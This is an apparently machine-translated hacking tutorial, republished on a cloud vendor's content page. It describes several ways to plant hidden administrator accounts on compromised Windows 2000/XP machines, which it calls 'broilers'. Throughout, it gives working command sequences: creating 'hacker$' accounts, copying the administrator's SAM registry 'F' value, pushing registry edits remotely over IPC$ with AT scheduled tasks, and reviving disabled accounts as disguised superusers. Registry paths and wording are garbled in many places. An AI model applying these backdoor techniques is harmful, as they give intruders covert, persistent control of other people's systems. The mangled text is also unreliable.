Multiple hidden Superuser methods in Windows systems

Source: Internet
Author: User
Keywords Broiler Account
First, how to build a hidden Super User graphics interface in the GUI to apply local or open 3389 Terminal Services on the broiler. The author I mentioned above said that the method is very good, but more complex, but also to use Psu.exe (let the program as the system user status of the program), if the words on the broiler to upload psu.exe. I said this method will not have to psu.exe this program. Because Windows2000 has two registry editors: Regedit.exe and Regedt32.exe. XP Regedit.exe and Regedt32.exe are actually a program that modifies the rights of key values by right-clicking "permissions" in the right key. I think everyone is familiar with the Regedit.exe, but you can't set permissions on the key keys to the registry, and Regedt32.exe the biggest advantage is the ability to set permissions on key keys in the registry. Enforces's account information is under the Registry's Hkey_local_machinesamsam key, but other users are not authorized to see the information except system users, so I first set the SAM key to "Regedt32.exe" for me. Full Control permission. This allows you to read and write the information in the SAM key. The specific steps are as follows: 1. Assuming that we are logged on to a broiler with Terminal Services as Superuser Administrator, first create an account at the command line or in the Account Manager: hacker$, here I set up this account at the command line net user hacker$ 1234/ ADD2, enter in Start/run: Regedt32.exe and return to run Regedt32.exe. 3, point "permission" will pop up the window point after adding the account I logged in to the security bar, here I am logged in as the administrator, so I will join the administrator and set the permissions to "Full Control." Here is a note: It is better to add the account or account you are logged in to the group, do not modify the original account or group, otherwise it will bring a series of unnecessary problems. And so the hidden super user is built, and then come here to delete the account you added. 4, then click "Start" → "Run" and enter "Regedit.exe" return, start Registry Editor Regedit.exe. Open key: hkey_local_maichinesamsamdomainsaccountusernameshacker$ 5, export items hacker$, 00000409, 000001f4 to Hacker.reg, 409.reg , 1f4.reg, use Notepad to play these exported files for editing, the super user's corresponding items 000001f4The value of the key "F" is copied, and the value of the key "F" under item 00000409 of hacker$ is overwritten, and then the 00000409.reg is merged with the Hacker.reg. 6. Execute NET user hacker$ at the command line/del users hacker$ deleted: NET user hacker$/del7, F5 Refresh in Regedit.exe window and then file-Import registry file will modify the Hacker.reg Import Registry 8, to this, the hidden Superuser hacker$ has been built, and then close Regedit.exe. In the Regedt32.exe window, change the Hkey_local_machinesamsam key permissions back to the original (as long as you delete the added account administrator). 9. Note: Hidden super user built, in the account manager can not see hacker$ this user, in the command line with the "NET User" command can not see, but after the establishment of superuser, you can no longer change the password, if the net user command to change the hacker$ password, The hidden Superuser will be seen again in the account manager and cannot be deleted. Ii. How to remotely create a hidden superuser at the command line this will use the AT command, because the scheduled task produced with at is run as a system, so the Psu.exe program is not used. In order to be able to use the AT command, the broiler must have a schedule service, if not open, can be used in Streamer tools Netsvc.exe or Sc.exe to remotely start, of course, its method can also, as long as can start schedule service on the line. For command-line methods, you can use a variety of connection methods, such as using SqlExec to connect MSSQL 1433 ports, or Telnet service, as long as you can get a cmdshell and have permission to run at command. 1, first to find a chicken, as to how to find that is not what I am talking about the topic. Let's assume that we've found a super User administrator with a password of 12345678, and now we're starting to remotely create a hidden superuser for it at the command line. (in the example of the host is a host in my local area network, I will change its IP address to 13.50.97.238, please do not on the Internet, to avoid harassment of normal IP address.) 2, first to establish a connection with the broiler, the command is: net use 13.50.97.238ipc$ "12345678" supplied: "Administrator 3, with the AT command in the broiler to establish a user (if the at service does not start, Netsvc.exe or S of Banyan availableC.exe to remotely boot): at 13.50.97.238 12:51 c:\winntsystem32net.exe user hacker$ 1234/add create this plus $ character username, because after the $ character is added, the command line uses net User will not display this, but will be able to see this user in the account manager. 4, the same with the AT command export hkey_local_machinesamsamdomainsaccountusers key value: at 13.50.97.238 12:55 c:\winntregedit.exe/e Hacker.reg HKEY_LOCAL_MACHINESAMSAMDOMAINSACCOUNTUSERS/E is the Regedit.exe parameter in _local_ Machinesamsamdomainsaccountusers this key must end. If necessary, you can enclose the c:\winntregedit.exe/e hacker.reg hkey_local_machinesamsamdomainsaccountusers in quotation marks. 5, the chicken on the Hacker.reg download to the computer with Notepad to open the edit command: Copy 13.50.97.238admin$system32hacker.reg C:\ Hacker.reg Modified method has been introduced in the graphics industry, and here is not introduced. 6, and then edit the Hacker.reg back to the broiler copy C:\hacker.reg 13.50.97.238admin$system32hacker1.reg7, view broiler time: Net times 13.50.97.238 Then use the AT command to remove the user hacker$: at 13.50.97.238 13:40 net user hacker$/del8, verify that hacker$ is removed: Disconnect from the broiler with net use 13.50.97.238/del. NET use 13.50.97.238ipc$ "1234" supplied: "hacker$" with the account hacker$ connection with the broiler, cannot connect the description has been deleted. 9, and then set up a connection with the broiler: net use 13.50.97.238ipc$ "12345678" supplied: "Administrator" to get the chicken time, with at the command will be copied back to the Broiler Hacker1.reg import Broiler registry: at 13.50.97.238 13:41 c:winntregedit.exe/s hacker1.regregedit.exe parameter/s is the quiet mode. 10, and then verify that hacker$ has been established, the same method as above to verify that hacker$ is deleted. 11, and then verify the user hacker$ whether read, write, delete the permissions, if not assured that you can also verify the establishment of other accounts. 12, through 11 can be concluded that the user hacker$ has Superuser rights, because initially I used at the command to establish it is an ordinary user, but now has remote read, write, delete permissions. Third, if the broiler does not open 3389 Terminal Services, and I do not want to use the command line, how to do? In this case, you can also use the interface to remotely create a hidden superuser for the broiler. Because Regedit.exe, Regedt32.exe have the ability to connect to the network registry, you can use Regedt32.exe to set permissions for the registry keys for remote hosts, and to edit the remote registry with Regedit.exe. The account Manager also has a function that connects another computer, and you can use the Account Manager to create and delete accounts for remote hosts. The concrete step is similar with the above introduction, I do not say much, only its speed is really unbearable. But here are two prerequisites: 1, the net use chicken ipipc$ "Password" supplied: "Super username" to establish a connection with the remote host, you can use Regedit.exe Regedt32.exe and account manager to connect with the remote host. 2, the remote host must open the Remote Registry service (not open, you can also remotely open, because you have the password of the super user). Iv. Create a hidden superuser with a disabled account we can use the banned users on the broiler to build a hidden group of users. The method is as follows: 1. Find out which users are prohibited by careful administrators, and in general, some administrators usually disable guest for security reasons, Of course, other users will be disabled. Under the graphical interface, it's very easy to see a red fork on a disabled account in the Account manager, and at the command line, I haven't figured out a good way to see if a user is disabled by using a command at the command line: "NET user username." 2. Here, we assume that the user hacker is disabled by the administrator. First of all, I first use the super group of Banyan user cloning program CA.exe, will be disabled user hacker clone to Superuser (after cloning, the disabled user hacker will automatically be activated): CA. EXE Broiler IP Administrator Super User password Hacher hacher password. 3. If you're a cmdshe nowll, such as using the Telnet service or SqlExec to connect the broiler's MSSQL default port 1433 can get the shell, when you just enter the command: NET user Hacker/active:no so that users hacker is disabled ( At least on the surface), of course, you can also convert user Hacher to other disabled users. 4. If you look at the user in the account manager under the graphical interface, you will find that the user hacker is disabled, but is this actually the case? You use this disabled user to connect to the chicken to see if you can connect? Using the command: NET user broiler ipipc$ "hacker password" supplied: "Hacker" even a look. I can tell you that after many experiments I have been able to succeed, but also super user rights. 5. What if there is no Cmdshell? You can disable the user hacker by the AT command I described above: at Chicken IP Time net user Hacker/active:no 6. Principle: Concrete Advanced principle I also can't say, I can only from the simplest say. You first in the graphical interface in the Account Manager to disable the Superuser administrator look, will certainly pop a dialog box, and prohibit you continue to disable the Superuser administrator, again, because at the time of cloning, hacker in the registry "F" The key is replaced by the "F" key in the registry by the Superuser administrator, so hacker has the power of Superuser, but because hacker is in the registry "C" or the original "C" key, so hacker will be disabled, However, its superuser privileges are not disabled, so disabled users hacker can still connect to the broiler and have superuser privileges. I also said that I do not understand, let us understand it. V. points to note 1. After the hidden Superuser is established, the user is not visible in the Account manager and the command line, but the user exists. 2. After the hidden Superuser is established, the password can no longer be modified, because once the password is changed, the hidden Superuser is exposed to the account manager and cannot be deleted. 3, if the test on this machine, it is best to use the system's own backup tool to first back up the computer's "system State" is mainly a backup of the registry, because I did the experiment, the account manager did not see any users, the group also saw no group phenomenon, but they exist. Luckily I have backup, hehe. The SAM key is the most sensitive part of the system after all. 4. This method is tested on 2000/XP and not on NT. Executive Editor Zhao Zhaoyi#51cto.com TEL: (010) 68476636-8001 to force (0 votes) (0 Votes) nonsense (0 Votes) Professional (0 Votes) The title party (0 Votes) Pass (0 Votes) The original text: A variety of hidden super user methods in Windows system return to network security home

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.